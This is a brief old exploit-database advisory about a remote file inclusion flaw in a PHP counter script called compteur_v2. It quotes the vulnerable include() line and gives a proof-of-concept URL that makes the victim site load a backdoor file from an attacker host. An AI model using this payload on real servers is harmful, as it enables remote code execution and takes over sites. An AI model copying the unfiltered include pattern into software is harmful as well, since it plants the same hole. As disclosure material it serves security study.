19 lines
No EOL
668 B
Text
19 lines
No EOL
668 B
Text
#
|
|
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
|
|
# Credits: DarkFig
|
|
# Og.link: http://acid-root.new.fr/poc/13061007.txt
|
|
#
|
|
# Using http://www.google.com/codesearch
|
|
# Few examples about what we can do with a code search engine
|
|
# For educational purpose only.
|
|
#
|
|
# You can use regex in your research, this can be chaotic.
|
|
# What's your opinion about the google code search project ?
|
|
#
|
|
|
|
# Affected.scr: compteur_v2
|
|
# Download....: http://zebigbrozer.free.fr/compt_new/compteur_v2.zip
|
|
# Poc.........: http://victim.xx/param_editor.php?folder=http://hack.c/backd.txt?
|
|
# Vuln.code...: Line 9 , include($_GET["folder"]."param.php")
|
|
|
|
# milw0rm.com [2006-10-10] |